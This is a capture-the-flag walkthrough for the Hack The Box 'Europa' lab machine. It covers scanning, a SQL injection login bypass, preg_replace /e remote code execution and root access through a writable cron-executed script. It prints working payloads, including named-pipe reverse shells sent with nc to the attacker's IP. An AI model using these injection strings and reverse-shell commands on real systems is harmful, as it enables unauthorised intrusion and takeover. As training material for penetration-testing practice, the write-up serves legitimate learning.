Difficulty Rating:

Machine: Europa
OS: Linux
IP: 10.10.10.22

  • Nmap
$ nmap -T4 -sV -Pn -A  10.10.10.22 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-29 14:58 IST
Nmap scan report for 10.10.10.22
Host is up (0.19s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
|   256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
|_  256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (EdDSA)
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after:  2027-04-17T09:06:22
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.10 seconds

  • Port 80 and 443 are open. Let’s go for dirb and nikto

  • Dirb

$ dirb https://admin-portal.europacorp.htb/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jul 29 15:12:24 2017
URL_BASE: https://admin-portal.europacorp.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: https://admin-portal.europacorp.htb/ ----
==> DIRECTORY: https://admin-portal.europacorp.htb/data/                                                          
==> DIRECTORY: https://admin-portal.europacorp.htb/dist/                                                           
+ https://admin-portal.europacorp.htb/index.php (CODE:302|SIZE:0)                                                       
==> DIRECTORY: https://admin-portal.europacorp.htb/js/                                                                  
==> DIRECTORY: https://admin-portal.europacorp.htb/logs/                                                                          
+ https://admin-portal.europacorp.htb/server-status (CODE:403|SIZE:316)                                                           
==> DIRECTORY: https://admin-portal.europacorp.htb/vendor/                                                                          
                                                                                                                                                                                             
---- Entering directory: https://admin-portal.europacorp.htb/data/ ----
                                                                                                                                                                                             
---- Entering directory: https://admin-portal.europacorp.htb/dist/ ----
==> DIRECTORY: https://admin-portal.europacorp.htb/dist/css/                                                  
==> DIRECTORY: https://admin-portal.europacorp.htb/dist/js/                                                       
                                                                                                                                                                                             
---- Entering directory: https://admin-portal.europacorp.htb/js/ ----
                                                                                                                                                                                             
---- Entering directory: https://admin-portal.europacorp.htb/logs/ ----
                                                                                                                                                                                             
---- Entering directory: https://admin-portal.europacorp.htb/vendor/ ----
==> DIRECTORY: https://admin-portal.europacorp.htb/vendor/jquery/ 
  • Dirb for php files
$ dirb https://admin-portal.europacorp.htb/ -X .php

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jul 29 16:11:13 2017
URL_BASE: https://admin-portal.europacorp.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: https://admin-portal.europacorp.htb/ ----
+ https://admin-portal.europacorp.htb/dashboard.php (CODE:302|SIZE:0)                      
+ https://admin-portal.europacorp.htb/db.php (CODE:200|SIZE:0)                    
+ https://admin-portal.europacorp.htb/index.php (CODE:302|SIZE:0)               
+ https://admin-portal.europacorp.htb/login.php (CODE:200|SIZE:3968)                                                                             
+ https://admin-portal.europacorp.htb/logout.php (CODE:302|SIZE:0)                                                                       
+ https://admin-portal.europacorp.htb/tools.php (CODE:302|SIZE:0)                                                                             
                                                                                                                                                                                             
-----------------
END_TIME: Sat Jul 29 16:27:53 2017
DOWNLOADED: 4612 - FOUND: 6

  • Nikto
nikto -h https://admin-portal.europacorp.htb/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.22
+ Target Hostname:    admin-portal.europacorp.htb
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=GR/ST=Attica/L=Athens/O=EuropaCorp Ltd./OU=IT/CN=europacorp.htb/[email protected]
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=GR/ST=Attica/L=Athens/O=EuropaCorp Ltd./OU=IT/CN=europacorp.htb/[email protected]
+ Start Time:         2017-07-29 15:12:40 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: https://admin-portal.europacorp.htb/login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Hostname 'admin-portal.europacorp.htb' does not match certificate's names: europacorp.htb
+ Cookie PHPSESSID created without the secure flag
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3093: /db.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7517 requests: 16 error(s) and 10 item(s) reported on remote host
+ End Time:           2017-07-29 16:54:57 (GMT5.5) (6137 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  • Login page is SQL injection vulnerable
  • The email field is sensitive to space and need to have @ and something else ahead.
  • Hence, type something in email box and intercept it in Burp Suite
  • Change email to email=' union select 1,2,3,4,5;#&password=
  • You get access to the dashboard
  • Go to tools
  • Enter IP address and check what the code does to it
  • You’ll find a line like this in the source code of /tools.php:
 <input type="hidden" name="pattern" value="/ip_address/">

Read the following article to understand the concept: https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace

  • All we have to do is intercept the post request and append ‘e’ to the /ip-address/.
  • Intercept the post request using Burp Suite and find a line similar to this:
pattern=%2Fip_address%2F
  • Add ‘e’ after pattern=%2Fip_address%2F. So it will look like this:
pattern=%2Fip_address%2Fe
  • So, basically you’ve got RCE. Upoad a php payload and get meterpreter.

Note: Current directory is /var/www/admin and it doesn’t have permission for www-data user to edit anything. Find a directory inside /var/www/admin to upload the php file. For example /logs directory.

  • After getting shell, check /etc/crontab file.
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * *	root	/var/www/cronjobs/clearlogs
$ cat /var/www/cronjobs/clearlogs
#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
  • After checking permissions of /var/www/cronjobs/clearlogs, we can see that we can’t edit it.
$ ls -la /var/www/cronjobs/
total 12
drwxr-xr-x 2 root root 4096 Jun 23 09:21 .
drwxr-xr-x 6 root root 4096 May 12 20:27 ..
-r-xr-xr-x 1 root root  132 May 12 20:29 clearlogs
  • Let’s check for /var/www/cmd/logcleared.sh
  • We can see that there’s no such file available
  • We can create a file to get root shell
  • Create a file named logcleared.sh
  • Contents of the file will be
#!/bin/sh
mknod /tmp/backpipe p
/bin/sh 0< /tmp/backpipe | nc 10.10.15.16 80 1> /tmp/backpipe
  • Upload it at /var/www/cmd/logcleared.sh

This is handy way of getting shell. It’s an alternative to nc <ip> <port> -e /bin/bash

  • At attacker’s side, start nc and wait for it to connect
sudo nc -nvlp 80
Listening on [0.0.0.0] (family 0, port 80)
Connection from 10.10.10.22 44886 received!
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
XXXXXXX

Note: An alternative to getting shell without meterpreter would be putting folowing code in IP address field of /tools.php:

system('mknod logs/backpipe p; /bin/sh 0< logs/backpipe | nc 10.10.15.16 4444 1> logs/backpipe');
  • Listen using nc
$ nc -nvlp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 10.10.10.22 49688 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
User and Root owned!!

Share the fun!